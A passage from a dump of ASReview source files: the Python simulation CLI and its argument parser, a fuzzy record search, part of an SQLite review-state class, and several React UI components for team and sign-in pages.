asreview.project import ASReviewProject\nfrom asreview.project import ProjectExistsError\nfrom asreview.project import open_state\nfrom asreview.review.simulate import ReviewSimulate\nfrom asreview.settings import ASReviewSettings\nfrom asreview.types import type_n_queries\nfrom asreview.utils import get_random_state\n\n\ndef _get_dataset_path_from_args(args_dataset):\n \"\"\"Remove 'benchmark:' from the dataset name and add .csv suffix.\n\n Parameters\n ----------\n args_dataset : str\n Name of the dataset.\n\n Returns\n -------\n str\n Dataset name without 'benchmark:' if it started with that,\n and with .csv suffix.\n \"\"\"\n if args_dataset.startswith(\"benchmark:\"):\n args_dataset = args_dataset[10:]\n\n return Path(args_dataset).with_suffix(\".csv\").name\n\n\ndef _set_log_verbosity(verbose):\n if verbose == 0:\n logging.getLogger().setLevel(logging.WARNING)\n elif verbose == 1:\n logging.getLogger().setLevel(logging.INFO)\n elif verbose >= 2:\n logging.getLogger().setLevel(logging.DEBUG)\n\n\nclass SimulateEntryPoint(BaseEntryPoint):\n \"\"\"Entry point for simulation with ASReview LAB.\"\"\"\n\n def execute(self, argv): # noqa\n # parse arguments\n parser = _simulate_parser()\n args = parser.parse_args(argv)\n\n # change the verbosity\n _set_log_verbosity(args.verbose)\n\n # check for state file extension\n if args.state_file is None:\n raise ValueError(\"Specify project file name (with .asreview extension).\")\n\n # for webapp\n if args.dataset == \"\":\n project = ASReviewProject(args.state_file)\n\n with open_state(args.state_file) as state:\n settings = state.settings\n\n # Check if there are new labeled records.\n exist_new_labeled_records = state.exist_new_labeled_records\n\n # collect command line arguments and pass them to the reviewer\n if exist_new_labeled_records:\n fp_data = Path(\n project.project_path, \"data\", project.config[\"dataset_path\"]\n )\n as_data = ASReviewData.from_file(fp_data)\n prior_idx = args.prior_idx\n\n classifier_model = get_classifier(settings.model)\n query_model = 
get_query_model(settings.query_strategy)\n balance_model = get_balance_model(settings.balance_strategy)\n feature_model = get_feature_model(settings.feature_extraction)\n\n # for simulation CLI\n else:\n # do this check now and again when zipping.\n if Path(args.state_file).exists():\n raise ProjectExistsError(\"Project already exists.\")\n\n as_data = load_data(args.dataset)\n\n if len(as_data) == 0:\n raise ValueError(\n \"Supply at least one dataset\" \" with at least one record.\"\n )\n\n # create a project file\n fp_tmp_simulation = Path(args.state_file).with_suffix(\".asreview.tmp\")\n\n project = ASReviewProject.create(\n fp_tmp_simulation,\n project_id=Path(args.state_file).stem,\n project_mode=\"simulate\",\n project_name=Path(args.state_file).stem,\n project_description=\"Simulation created via ASReview via \"\n \"command line interface\",\n )\n\n # Add the dataset to the project file.\n dataset_path = _get_dataset_path_from_args(args.dataset)\n\n as_data.to_file(Path(fp_tmp_simulation, \"data\", dataset_path))\n # Update the project.json.\n project.update_config(dataset_path=dataset_path)\n\n # create a new settings object from arguments\n settings = ASReviewSettings(\n model=args.model,\n n_instances=args.n_instances,\n stop_if=args.stop_if,\n n_prior_included=args.n_prior_included,\n n_prior_excluded=args.n_prior_excluded,\n query_strategy=args.query_strategy,\n balance_strategy=args.balance_strategy,\n feature_extraction=args.feature_extraction,\n )\n settings.from_file(args.config_file)\n\n # Initialize models.\n random_state = get_random_state(args.seed)\n classifier_model = get_classifier(\n settings.model, random_state=random_state, **settings.model_param\n )\n query_model = get_query_model(\n settings.query_strategy,\n random_state=random_state,\n **settings.query_param,\n )\n balance_model = get_balance_model(\n settings.balance_strategy,\n random_state=random_state,\n **settings.balance_param,\n )\n feature_model = get_feature_model(\n settings.feature_extraction,\n random_state=random_state,\n **settings.feature_param,\n )\n\n # prior knowledge\n if (\n args.prior_idx is not None\n and args.prior_record_id is not None\n and len(args.prior_idx) > 0\n and len(args.prior_record_id) > 0\n ):\n raise ValueError(\n \"Not possible to provide both prior_idx and prior_record_id\"\n )\n\n prior_idx = args.prior_idx\n if args.prior_record_id is not None and len(args.prior_record_id) > 0:\n prior_idx = convert_id_to_idx(as_data, args.prior_record_id)\n\n if classifier_model.name.startswith(\"lstm-\"):\n classifier_model.embedding_matrix = feature_model.get_embedding_matrix(\n as_data.texts, args.embedding_fp\n )\n\n try:\n # Initialize the review class.\n reviewer = ReviewSimulate(\n as_data,\n project=project,\n model=classifier_model,\n query_model=query_model,\n balance_model=balance_model,\n feature_model=feature_model,\n n_papers=args.n_papers,\n n_instances=args.n_instances,\n stop_if=args.stop_if,\n prior_indices=prior_idx,\n n_prior_included=args.n_prior_included,\n n_prior_excluded=args.n_prior_excluded,\n init_seed=args.init_seed,\n write_interval=args.write_interval,\n )\n\n # Start the review process.\n project.update_review(status=\"review\")\n\n with open_state(project, read_only=True) as s:\n prior_df = s.get_priors()\n\n print(\"The following records are prior knowledge:\\n\")\n for i, row in prior_df.iterrows():\n preview = as_data.record(row[\"record_id\"])\n print(preview)\n\n print(\"Simulation started\\n\")\n reviewer.review()\n except Exception as err:\n # 
save the error to the project\n project.set_error(err)\n\n raise err\n\n print(\"\\nSimulation finished\")\n project.mark_review_finished()\n\n # create .ASReview file out of simulation folder\n if args.dataset != \"\":\n project.export(args.state_file)\n shutil.rmtree(fp_tmp_simulation)\n\n\nDESCRIPTION_SIMULATE = \"\"\"\nASReview for simulation.\n\nThe simulation modus is used to measure the performance of the ASReview\nsoftware on existing systematic reviews. The software shows how many\npapers you could have potentially skipped during the systematic\nreview.\"\"\"\n\n\ndef _simulate_parser(prog=\"simulate\", description=DESCRIPTION_SIMULATE):\n\n # parse arguments if available\n parser = argparse.ArgumentParser(\n prog=prog,\n description=description,\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n # Active learning parameters\n # File path to the data.\n parser.add_argument(\n \"dataset\",\n type=str,\n help=\"File path to the dataset or one of the benchmark datasets.\",\n )\n # Initial data (prior knowledge)\n parser.add_argument(\n \"--n_prior_included\",\n default=DEFAULT_N_PRIOR_INCLUDED,\n type=int,\n help=\"Sample n prior included papers. \"\n \"Only used when --prior_idx is not given. \"\n f\"Default {DEFAULT_N_PRIOR_INCLUDED}\",\n )\n\n parser.add_argument(\n \"--n_prior_excluded\",\n default=DEFAULT_N_PRIOR_EXCLUDED,\n type=int,\n help=\"Sample n prior excluded papers. \"\n \"Only used when --prior_idx is not given. \"\n f\"Default {DEFAULT_N_PRIOR_EXCLUDED}\",\n )\n\n parser.add_argument(\n \"--prior_idx\",\n default=[],\n nargs=\"*\",\n type=int,\n help=\"Prior indices by rownumber (0 is first rownumber).\",\n )\n parser.add_argument(\n \"--prior_record_id\",\n default=[],\n nargs=\"*\",\n type=int,\n help=\"Prior indices by record_id.\",\n )\n # logging and verbosity\n parser.add_argument(\n \"--state_file\",\n \"-s\",\n default=None,\n type=str,\n help=\"Location to ASReview project file of simulation.\",\n )\n parser.add_argument(\n \"-m\",\n \"--model\",\n type=str,\n default=DEFAULT_MODEL,\n help=f\"The prediction model for Active Learning. \"\n f\"Default: '{DEFAULT_MODEL}'.\",\n )\n parser.add_argument(\n \"-q\",\n \"--query_strategy\",\n type=str,\n default=DEFAULT_QUERY_STRATEGY,\n help=f\"The query strategy for Active Learning. \"\n f\"Default: '{DEFAULT_QUERY_STRATEGY}'.\",\n )\n parser.add_argument(\n \"-b\",\n \"--balance_strategy\",\n type=str,\n default=DEFAULT_BALANCE_STRATEGY,\n help=\"Data rebalancing strategy mainly for RNN methods. Helps against\"\n \" imbalanced dataset with few inclusions and many exclusions. \"\n f\"Default: '{DEFAULT_BALANCE_STRATEGY}'\",\n )\n parser.add_argument(\n \"-e\",\n \"--feature_extraction\",\n type=str,\n default=DEFAULT_FEATURE_EXTRACTION,\n help=\"Feature extraction method. Some combinations of feature\"\n \" extraction method and prediction model are impossible/ill\"\n \" advised.\"\n f\"Default: '{DEFAULT_FEATURE_EXTRACTION}'\",\n )\n parser.add_argument(\n \"--init_seed\",\n default=None,\n type=int,\n help=\"Seed for setting the prior indices if the --prior_idx option is \"\n \"not used. 
If the option --prior_idx is used with one or more \"\n \"indices, this option is ignored.\",\n )\n parser.add_argument(\n \"--seed\",\n default=None,\n type=int,\n help=\"Seed for the model (classifiers, balance strategies, \"\n \"feature extraction techniques, and query strategies).\",\n )\n parser.add_argument(\n \"--config_file\",\n type=str,\n default=None,\n help=\"Configuration file with model settings \" \"and parameter values.\",\n )\n parser.add_argument(\n \"--n_instances\",\n default=DEFAULT_N_INSTANCES,\n type=int,\n help=\"Number of papers queried each query. \" f\"Default {DEFAULT_N_INSTANCES}.\",\n )\n parser.add_argument(\n \"--n_queries\",\n type=type_n_queries,\n default=\"min\",\n help=\"Deprecated, use 'stop_if' instead.\",\n )\n parser.add_argument(\n \"--stop_if\",\n type=type_n_queries,\n default=\"min\",\n help=\"The number of label actions to simulate. Default, 'min' \"\n \"will stop simulating when all relevant records are found. Use -1 \"\n \"to simulate all label actions.\",\n )\n parser.add_argument(\n \"-n\",\n \"--n_papers\",\n type=int,\n default=None,\n help=\"Deprecated, use 'stop_if' instead.\",\n )\n parser.add_argument(\"--verbose\", \"-v\", default=0, type=int, help=\"Verbosity\")\n parser.add_argument(\n \"--write_interval\",\n \"-w\",\n default=None,\n type=int,\n help=\"The simulation data will be written after each set of this \"\n \"many labeled records. By default only writes data at the end \"\n \"of the simulation to make it as fast as possible.\",\n )\n parser.add_argument(\n \"--embedding\",\n type=str,\n default=None,\n dest=\"embedding_fp\",\n help=\"File path of embedding matrix. Required for LSTM models.\",\n )\n return parser\n" }, { "alpha_fraction": 0.7523770332336426, "alphanum_fraction": 0.757337749004364, "avg_line_length": 35.10447692871094, "blob_id": "0678546f79f4e44487df1608a24c73398b7f7782", "content_id": "7f4b46d828887dc0607f7d065aca998e2f19bb73", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2419, "license_type": "permissive", "max_line_length": 109, "num_lines": 67, "path": "/asreview/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.data.base import ASReviewData\nfrom asreview.data.base import load_data\nfrom asreview.io.utils import list_readers\nfrom asreview.io.utils import list_writers\nfrom asreview.project import ASReviewProject\nfrom asreview.project import open_state\nfrom asreview.utils import asreview_path\nfrom asreview.utils import get_data_home\n\nfrom ._version import get_versions\n\n__version__ = get_versions()[\"version\"]\ndel get_versions\n\n__all__ = [\n \"asreview_path\",\n \"ASReviewData\",\n \"ASReviewProject\",\n \"get_data_home\",\n \"list_readers\",\n \"list_writers\",\n \"open_state\",\n]\n\n# deprecated in __init__.py, use asreview.models.feature_extraction instead\nfrom asreview._deprecated import _deprecated_func\nfrom asreview.models.feature_extraction.embedding_lstm import load_embedding as _load_embedding # NOQA\nfrom asreview.models.feature_extraction.embedding_lstm import sample_embedding as _sample_embedding # NOQA\nfrom asreview.models.feature_extraction.embedding_lstm import text_to_features as _text_to_features # NOQA\n\n\n@_deprecated_func(\n \"Importing load_embedding from asreview.load_embedding is deprecated, \"\n \"use asreview.models.feature_extraction.load_embedding instead\"\n)\ndef load_embedding(*args, **kwargs):\n return _load_embedding(*args, **kwargs)\n\n\n@_deprecated_func(\n \"Importing sample_embedding from asreview.sample_embedding is deprecated, \"\n \"use asreview.models.feature_extraction.sample_embedding instead\"\n)\ndef sample_embedding(*args, **kwargs):\n return _sample_embedding(*args, **kwargs)\n\n\n@_deprecated_func(\n \"Importing text_to_features from asreview.text_to_features is deprecated, \"\n \"use asreview.models.feature_extraction.text_to_features instead\"\n)\ndef text_to_features(*args, **kwargs):\n return _text_to_features(*args, **kwargs)\n" }, { "alpha_fraction": 0.568730354309082, "alphanum_fraction": 0.5729275941848755, "avg_line_length": 22.2439022064209, "blob_id": "beef729d6e55671cff53cd2195d4072568ad4c44", "content_id": "2b375ac812ec5af52a0eb608e9fd510216c460b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 953, "license_type": "permissive", "max_line_length": 72, "num_lines": 41, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/TeamPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { PageHeader } from \"../../Components\";\nimport { EndCollaboration, InvitationContents } from \".\";\n\nconst PREFIX = \"TeamPage\";\n\nconst classes = {\n cardWrapper: `${PREFIX}-card-wrapper`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardWrapper}`]: {\n paddingTop: 32,\n [theme.breakpoints.down(\"md\")]: {\n paddingLeft: 0,\n paddingRight: 0,\n },\n },\n}));\n\nconst TeamPage = (props) 
=> {\n return (\n <Root aria-label=\"history page\">\n <Fade in>\n <Box>\n <PageHeader header=\"Team\" mobileScreen={props.mobileScreen} />\n\n <Box className=\"main-page-body-wrapper\">\n {props.isOwner && <InvitationContents />}\n {!props.isOwner && <EndCollaboration />}\n </Box>\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default TeamPage;\n" }, { "alpha_fraction": 0.581935465335846, "alphanum_fraction": 0.5845161080360413, "avg_line_length": 28.80769157409668, "blob_id": "85de202ad1c2f7fd91ae1071d97e16386b8a1993", "content_id": "c10d8bf7e336beb91c398ff048e4463557fb74ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 775, "license_type": "permissive", "max_line_length": 74, "num_lines": 26, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/DialogHeader.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { DialogTitle, Stack, Tooltip } from \"@mui/material\";\nimport { Close } from \"@mui/icons-material\";\nimport { StyledIconButton } from \"../../StyledComponents/StyledButton.js\";\n\nconst DialogHeader = (props) => {\n return (\n <Stack className=\"dialog-header\" direction=\"row\">\n <DialogTitle>{props.title}</DialogTitle>\n <Stack direction=\"row\" spacing={1} sx={{ alignItems: \"center\" }}>\n <Stack\n className=\"dialog-header-button right\"\n direction=\"row\"\n spacing={1}\n >\n <Tooltip title=\"Close\">\n <StyledIconButton onClick={props.handleClose}>\n <Close />\n </StyledIconButton>\n </Tooltip>\n </Stack>\n </Stack>\n </Stack>\n );\n};\n\nexport default DialogHeader;\n" }, { "alpha_fraction": 0.5450000166893005, "alphanum_fraction": 0.5450000166893005, "avg_line_length": 22.255813598632812, "blob_id": "d4d5af325107e953ea76030a3ce8e5e759ebe6e1", "content_id": "bbcf08f5df63caa7451900929c30db64eb21a6b9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1000, "license_type": "permissive", "max_line_length": 70, "num_lines": 43, "path": "/asreview/webapp/src/Components/PersistSignIn.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { Navigate, Outlet, useLocation } from \"react-router-dom\";\nimport useAuth from \"../hooks/useAuth\";\n\nimport { AuthAPI } from \"../api\";\n\nconst PersistSignIn = () => {\n const location = useLocation();\n const { auth, setAuth } = useAuth();\n const [isLoading, setIsLoading] = React.useState(\n !auth?.logged_in ? true : false,\n );\n\n const { isError } = useQuery(\"refresh\", AuthAPI.refresh, {\n enabled: isLoading,\n onSettled: () => {\n setIsLoading(false);\n },\n onSuccess: (data) => {\n setAuth((prev) => {\n return {\n ...prev,\n logged_in: data.logged_in,\n name: data.name,\n id: data.id,\n };\n });\n },\n retry: false,\n });\n\n return (\n <>\n {!isError && (isLoading ? 
null : <Outlet />)}\n {isError && (\n <Navigate to={\"/signin\"} state={{ from: location }} replace />\n )}\n </>\n );\n};\n\nexport default PersistSignIn;\n" }, { "alpha_fraction": 0.6130550503730774, "alphanum_fraction": 0.6187845468521118, "avg_line_length": 28.79878044128418, "blob_id": "9a62717cabf0c679ac3f7848765c6b86bef3299f", "content_id": "2cf852ff5b9befef58e42292b0374a972adaa791", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4887, "license_type": "permissive", "max_line_length": 79, "num_lines": 164, "path": "/asreview/search.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport re\nfrom difflib import SequenceMatcher\n\nimport numpy as np\n\nfrom asreview.utils import format_to_str\n\n\nclass SearchError(Exception):\n pass\n\n\ndef _create_inverted_index(match_strings):\n index = {}\n word = re.compile(r\"['\\w]+\")\n for i, match in enumerate(match_strings):\n tokens = word.findall(match.lower())\n for token in tokens:\n if token in index:\n if index[token][-1] != i:\n index[token].append(i)\n else:\n index[token] = [i]\n return index\n\n\ndef _match_best(keywords, index, match_strings, threshold=0.75):\n n_match = len(match_strings)\n word = re.compile(r\"['\\w]+\")\n key_list = word.findall(keywords.lower())\n\n ratios = np.zeros(n_match)\n for key in key_list:\n cur_ratios = {}\n s = SequenceMatcher()\n s.set_seq2(key)\n for token in index:\n s.set_seq1(token)\n ratio = s.quick_ratio()\n if ratio < threshold:\n continue\n for idx in index[token]:\n if ratio > cur_ratios.get(idx, 0.0):\n cur_ratios[idx] = ratio\n\n for idx, rat in cur_ratios.items():\n ratios[idx] += rat\n\n return (100 * ratios) / len(key_list)\n\n\ndef _get_fuzzy_scores(keywords, match_strings):\n \"\"\"Rank a list of strings, depending on a set of keywords.\n\n Arguments\n ---------\n keywords: str\n Keywords that we are trying to find in the string list.\n str_list: list\n List of strings that should be scored according to the keywords.\n\n Returns\n -------\n numpy.ndarray\n Array of scores ordered in the same way as the str_list input.\n \"\"\"\n inv_index = _create_inverted_index(match_strings)\n return _match_best(keywords, inv_index, match_strings)\n\n\ndef _match_string(as_data):\n match_str = np.full(len(as_data), \"x\", dtype=object)\n\n all_titles = as_data.title\n all_authors = as_data.authors\n all_keywords = as_data.keywords\n\n if all_titles is None:\n raise SearchError(\"Cannot search dataset without titles.\")\n\n for i in range(len(as_data)):\n match_list = []\n\n # add titles\n match_list.append(all_titles[i])\n\n # add authors if present\n if all_authors is not None:\n match_list.append(format_to_str(all_authors[i]))\n\n # add keywords if present\n if all_keywords is not None:\n match_list.append(format_to_str(all_keywords[i]))\n\n match_str[i,] = \" \".join(match_list)\n 
return match_str\n\n\ndef fuzzy_find(\n as_data, keywords, threshold=60, max_return=10, exclude=None, by_index=True\n):\n \"\"\"Find a record using keywords.\n\n It looks for keywords in the title/authors/keywords\n (for as much as is available). Using the difflib package it creates\n a ranking based on token set matching.\n\n Arguments\n ---------\n as_data: asreview.data.ASReviewData\n ASReview data object to search\n keywords: str\n A string of keywords together, can be a combination.\n threshold: float\n Don't return records below this threshold.\n max_return: int\n Maximum number of records to return.\n exclude: list, numpy.ndarray\n List of indices that should be excluded in the search. You would\n put papers that were already labeled here for example.\n by_index: bool\n If True, use internal indexing.\n If False, use record ids for indexing.\n\n Returns\n -------\n list\n Sorted list of indexes that best match the keywords.\n \"\"\"\n new_ranking = _get_fuzzy_scores(keywords, _match_string(as_data))\n sorted_idx = np.argsort(-new_ranking)\n best_idx = []\n if exclude is None:\n exclude = np.array([], dtype=int)\n for idx in sorted_idx:\n if (\n (not by_index and as_data.df.index.values[idx] in exclude)\n or by_index\n and idx in exclude\n ):\n continue\n if len(best_idx) >= max_return:\n break\n if len(best_idx) > 0 and new_ranking[idx] < threshold:\n break\n best_idx.append(idx)\n fuzz_idx = np.array(best_idx, dtype=int)\n if not by_index:\n fuzz_idx = as_data.df.index.values[fuzz_idx]\n return fuzz_idx.tolist()\n" }, { "alpha_fraction": 0.5487911105155945, "alphanum_fraction": 0.5504123568534851, "avg_line_length": 32.09408950805664, "blob_id": "83afd54475a5799a4385c788f8bc781debaa8300", "content_id": "cf42e3a00cd6e04557db401337000bfe98287f72", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42559, "license_type": "permissive", "max_line_length": 88, "num_lines": 1286, "path": "/asreview/state/sqlstate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport sqlite3\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom asreview._version import get_versions\nfrom asreview.settings import ASReviewSettings\nfrom asreview.state.base import BaseState\nfrom asreview.state.errors import StateError\nfrom asreview.state.errors import StateNotFoundError\n\nREQUIRED_TABLES = [\n # the table with the labeling decisions and models trained\n \"results\",\n # the mapping of record identifiers to row numbers\n \"record_table\",\n # the latest probabilities.\n \"last_probabilities\",\n # the latest ranking.\n \"last_ranking\",\n # the record ids whose labeling decision was changed.\n \"decision_changes\",\n]\n\nRESULTS_TABLE_COLUMNS = [\n \"record_id\",\n \"label\",\n \"classifier\",\n \"query_strategy\",\n \"balance_strategy\",\n \"feature_extraction\",\n \"training_set\",\n \"labeling_time\",\n \"notes\",\n]\nSETTINGS_METADATA_KEYS = [\n \"settings\",\n \"state_version\",\n \"software_version\",\n \"model_has_trained\",\n]\n\n\nclass SQLiteState(BaseState):\n \"\"\"Class for storing the review state.\n\n The results are stored in an SQLite database.\n\n Arguments\n ---------\n read_only: bool\n Open state in read only mode. Default True.\n\n Attributes\n ----------\n version: str\n Return the version number of the state.\n settings: asreview.settings.ASReviewSettings\n Return an ASReview settings object with model settings and\n active learning settings.\n n_records_labeled: int\n Get the number of labeled records, where each prior is counted\n individually.\n n_priors: int\n Number of priors. 
If priors have not been selected returns None.\n exist_new_labeled_records: bool\n Have there been labeled records added to the state since the last time\n a model ranking was added to the state?\n model_has_trained: bool\n Has the ranking by a model been added to the state?\n \"\"\"\n\n def __init__(self, read_only=True):\n super(SQLiteState, self).__init__(read_only=read_only)\n\n # INTERNAL PATHS AND CONNECTIONS\n\n def _connect_to_sql(self):\n \"\"\"Get a connection to the SQLite database.\n\n Returns\n -------\n sqlite3.Connection\n Connection to the SQLite database.\n The connection is read only if self.read_only is true.\n \"\"\"\n if self.read_only:\n con = sqlite3.connect(f\"file:{str(self._sql_fp)}?mode=ro\", uri=True)\n else:\n con = sqlite3.connect(str(self._sql_fp))\n return con\n\n @property\n def _sql_fp(self):\n \"\"\"Get the path to the sqlite database.\"\"\"\n\n return Path(self.review_dir, \"results.sql\")\n\n @property\n def _settings_metadata_fp(self):\n \"\"\"Get the path to the settings and metadata json file.\"\"\"\n\n return Path(self.review_dir, \"settings_metadata.json\")\n\n def _create_new_state_file(self, working_dir, review_id):\n \"\"\"Create the files for storing a new state given a review_id.\n\n Stages:\n 1: create result structure\n 2: create model settings\n 3: add state to the project file\n\n Arguments\n ---------\n working_dir: str, pathlib.Path\n Project folder location.\n review_id: str\n Identifier of the review.\n \"\"\"\n if self.read_only:\n raise ValueError(\"Can't create new state file in read_only mode.\")\n\n self.review_dir = Path(working_dir, \"reviews\", review_id)\n\n # create the folder for this review inside the project folder\n self._sql_fp.parent.mkdir(parents=True, exist_ok=True)\n\n # Create results table.\n con = self._connect_to_sql()\n try:\n cur = con.cursor()\n\n # Create the results table.\n cur.execute(\n \"\"\"CREATE TABLE results\n (record_id INTEGER,\n label INTEGER,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n labeling_time INTEGER,\n notes TEXT)\"\"\"\n )\n\n # Create the record table.\n cur.execute(\n \"\"\"CREATE TABLE record_table\n (record_id INT)\"\"\"\n )\n\n # Create the last_probabilities table.\n cur.execute(\n \"\"\"CREATE TABLE last_probabilities\n (proba REAL)\"\"\"\n )\n\n # Create the last_ranking table.\n cur.execute(\n \"\"\"CREATE TABLE last_ranking\n (record_id INTEGER,\n ranking INT,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n time INTEGER)\"\"\"\n )\n\n # Create the table of changed decisions.\n cur.execute(\n \"\"\"CREATE TABLE decision_changes\n (record_id INTEGER,\n new_label INTEGER,\n time INTEGER)\"\"\"\n )\n\n con.commit()\n con.close()\n except sqlite3.Error as e:\n con.close()\n raise e\n\n # Create settings_metadata.json file\n # content of the settings is added later\n self.settings_metadata = {\n \"settings\": None,\n \"state_version\": \"1\",\n \"software_version\": get_versions()[\"version\"],\n \"model_has_trained\": False,\n }\n\n with open(self._settings_metadata_fp, \"w\") as f:\n json.dump(self.settings_metadata, f)\n\n def _restore(self, working_dir, review_id):\n \"\"\"\n Restore a state from files.\n\n Arguments\n ---------\n working_dir: str, pathlib.Path\n Project folder location.\n review_id: str\n Identifier of the review.\n \"\"\"\n # store filepath\n self.review_dir = Path(working_dir, \"reviews\", review_id)\n\n # If 
the state does not exist, raise an error\n if not working_dir.is_dir():\n raise StateNotFoundError(f\"Project {working_dir} doesn't exist.\")\n\n if not self._sql_fp.parent.is_dir():\n raise StateNotFoundError(f\"Review with id {review_id} doesn't exist.\")\n\n # Cache the settings.\n try:\n with open(self._settings_metadata_fp, \"r\") as f:\n self.settings_metadata = json.load(f)\n except FileNotFoundError:\n raise AttributeError(\n \"'settings_metadata.json' not found in the state file.\"\n )\n\n try:\n if not self._is_valid_version():\n raise ValueError(\n f\"State cannot be read: unsupported state version \"\n f\"{self.version} (expected version 1.x).\"\n )\n except AttributeError as err:\n raise ValueError(f\"Unexpected error when opening state file: {err}\")\n\n self._is_valid_state()\n\n def _is_valid_state(self):\n con = self._connect_to_sql()\n cur = con.cursor()\n column_names = cur.execute(\"PRAGMA table_info(results)\").fetchall()\n table_names = cur.execute(\n \"SELECT name FROM sqlite_master WHERE type='table';\"\n ).fetchall()\n con.close()\n\n # Check if all required tables are present.\n table_names = [tup[0] for tup in table_names]\n missing_tables = [\n table for table in REQUIRED_TABLES if table not in table_names\n ]\n if missing_tables:\n raise StateError(\n f\"The SQL file should contain tables named \"\n f\"'{' '.join(missing_tables)}'.\"\n )\n\n # Check if all required columns are present in results.\n column_names = [tup[1] for tup in column_names]\n missing_columns = [\n col for col in RESULTS_TABLE_COLUMNS if col not in column_names\n ]\n if missing_columns:\n raise StateError(\n f\"The results table does not contain the columns \"\n f\"{' '.join(missing_columns)}.\"\n )\n\n # Check that settings_metadata contains the required keys.\n missing_keys = [\n key\n for key in SETTINGS_METADATA_KEYS\n if key not in self.settings_metadata.keys()\n ]\n if missing_keys:\n raise StateError(\n f\"The keys {' '.join(missing_keys)} were not found in \"\n f\"settings_metadata.\"\n )\n\n def close(self):\n pass\n\n # PROPERTIES\n\n def _is_valid_version(self):\n \"\"\"Check compatibility of state version.\"\"\"\n return self.version[0] == \"1\"\n\n @property\n def version(self):\n \"\"\"Version number of the state.\n\n Returns\n -------\n str:\n Returns the version of the state.\n\n \"\"\"\n try:\n return self.settings_metadata[\"state_version\"]\n except KeyError:\n raise AttributeError(\n \"'settings_metadata.json' does not contain 'state_version'.\"\n )\n\n @property\n def settings(self):\n \"\"\"Settings of the ASReview pipeline.\n\n Example\n -------\n\n Example of settings.\n\n model : nb\n query_strategy : max_random\n balance_strategy : triple\n feature_extraction: tfidf\n n_instances : 1\n stop_if : min\n n_prior_included : 10\n n_prior_excluded : 10\n mode : simulate\n model_param : {'alpha': 3.822}\n query_param : {'strategy_1': 'max', 'strategy_2': 'random',\n 'mix_ratio': 0.95}\n feature_param : {}\n balance_param : {'a': 2.155, 'alpha': 0.94, ... 
'gamma': 2.0,\n 'shuffle': True}\n abstract_only : False\n\n \"\"\"\n settings = self.settings_metadata[\"settings\"]\n if settings is None:\n return None\n return ASReviewSettings(**settings)\n\n @settings.setter\n def settings(self, settings):\n if isinstance(settings, ASReviewSettings):\n self._add_settings_metadata(\"settings\", settings.to_dict())\n else:\n raise ValueError(\"'settings' should be an ASReviewSettings object.\")\n\n @property\n def n_records(self):\n \"\"\"Number of records in the loop.\n\n Returns\n -------\n int\n Number of records.\n \"\"\"\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"SELECT COUNT (*) FROM record_table\")\n n = cur.fetchone()[0]\n con.close()\n\n return n\n\n @property\n def n_records_labeled(self):\n \"\"\"Number labeled records.\n\n Returns\n -------\n int\n Number of labeled records, priors counted individually.\n \"\"\"\n labeled = self.get_labeled()\n return len(labeled)\n\n @property\n def n_priors(self):\n \"\"\"Number of records added as prior knowledge.\n\n Returns\n -------\n int\n Number of records which were added as prior knowledge.\n \"\"\"\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"SELECT COUNT (*) FROM results WHERE query_strategy='prior'\")\n n = cur.fetchone()\n con.close()\n n 